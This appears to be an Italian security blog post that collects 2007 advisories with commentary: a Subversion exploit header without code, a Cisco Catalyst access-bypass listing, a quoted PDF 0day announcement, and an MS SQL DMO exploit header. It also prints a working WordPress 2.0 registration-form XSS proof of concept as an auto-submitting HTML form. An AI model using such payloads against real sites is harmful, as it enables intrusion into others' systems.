Subversion 0.3.7/1.0.0 Remote Buffer Overflow Exploit

/***********************************************************
* hoagie_subversion.c
*
* Remote exploit against Subversion-Servers.
*
* Author: KnbykL <info@knbykl.org>
*
* Tested on Subversion 1.0.0 and 0.37
*
* Algorithm:
* This is a two-stage exploit. The first stage overflows
* a buffer on the stack and leaves us ~60 bytes of machine
* code to be executed. We try to find the socket-fd there
* and then do a read(2) on the socket. The exploit then
* sends the second stage loader to the server, which can
* be of any length (up to the obvious limits, of course).
* This second stage loader spawns /bin/sh on the server
* and connects it to the socket-fd.
*
* Credits:
*    void.at
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND
* A PROOF-OF-CONCEPT. THE AUTHOR CAN NOT BE HELD
* RESPONSIBLE FOR ANY DAMAGE OR CRIMINAL ACTIVITIES
* DONE USING THIS PROGRAM.
*
***********************************************************/

Bugtraq ID: 25822

Class: Access Validation Error

CVE:

Remote: Yes

Local: No

Published: Sep 26 2007 12:00AM

Updated: Sep 28 2007 04:39PM

Credit: The vendor credits Lee E. Rian with the discovery of this vulnerability.

Vulnerable:

• Cisco Catalyst 7600 3.1 (1a)WS-X6380-NAM
• Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-2
• Cisco Catalyst 7600 3.1 (1a)WS-SVC-NAM-1
• Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-2
• Cisco Catalyst 7600 2.2 (1a)WS-SVC-NAM-1
• Cisco Catalyst 7600 2.1 (2)WS-X6380-NAM
• Cisco Catalyst 7600 Sup720/MSFC3
• Cisco Catalyst 7600 Sup2/MSFC2
• Cisco Catalyst 6500 7.6 (1)
• Cisco Catalyst 6500 7.5 (1)
• Cisco Catalyst 6500 5.4.1
• Cisco Catalyst 6500 3.1 (1a)WS-X6380-NAM
• Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-2
• Cisco Catalyst 6500 3.1 (1a)WS-SVC-NAM-1
• Cisco Catalyst 6500 2.2 (1a)WS-SVC-NAM-2

[From Cisco Catalyst 6500 and Cisco 7600 Loopback Access Control Bypass Vulnerability]

Lasciatemi aggiungere … Per fortuna che se ne sono accorti in Cisco di questa “cosuccia” altrimenti sai che disastro?

Ritengo scortese pubblicare questo genere di informazioni soprattutto quando si parla del “padrone di casa” … ma tutto sommato … la sicurezza è un processo aperto e condiviso.

Bugtraq ID: 25769

Class: Input Validation Error

CVE: Remote: Yes Local: No

Published: Sep 22 2007 12:00AM

Updated: Sep 22 2007 12:00AM

Credit: Adrian Pastor is credited with the discovery of these vulnerabilities.

Vulnerable: WordPress WordPress 2.0

Ed ecco la PoC

[sourcecode language='xml']
<html>
<head></head>
<body>

<form method=”post” action=”http://target/wordpress/wp-register.php” >
<input type=”hidden” name=”action” value=”register” />
<input type=”hidden” name=”user_login” id=”user_login”
value=’”><script>alert(1)</script>’ />
<input type=”hidden” name=”user_email” id=”user_email”
value=’”><script>alert(2)</script>’ />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>[/sourcecode]

[From WordPress wp-register.php Multiple Cross-Site Scripting Vulnerabilities]

Il termine 0Day oramai è una buzzword bella e buona.

Ma come sempre accade c’è da prestare orecchio quando chi la usa è una persona (in questo caso team) di rilieavo, mi riferico ai ragazzi di GNUCitizen

Quello che si può leggere nella loro sezione project suona pressappoco così:

I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. [From 0day: PDF pwns Windows | GNUCITIZEN]

E la raccomandazione è …

The issue is quite critical given the fact that PDF documents are in the core of today’s modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available.

… penso che un gesto così magnanimo costerà molto ai tipi di Adobe, tanto “amore” non si vedere tutti i giorni, immaginate se, dall’altra parte, ci fosse stata Microsoft! Prosegue …

Adobe’s representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions are also affected.

… si certo come no! Basterebbe cambiare Sistema Operativo tanto semplice … !!! Per fortuna che esistono Evince ed Anteprima. In conclusione, una PoC non ce l’abbiamo, per fortuna o sfortuna che sia, però, nell’era di youtube, possiamo toglierci lo sfizio di vedere quello che accade

0day: PDF pwns Windows [From 0day: PDF pwns Windows | GNUCITIZEN]

Vecchi o no i bug exploitabili sono sempre bene accetti!

[sourcecode language='xml']
<!–

+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference &amp; Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)

–>

[/sourcecode]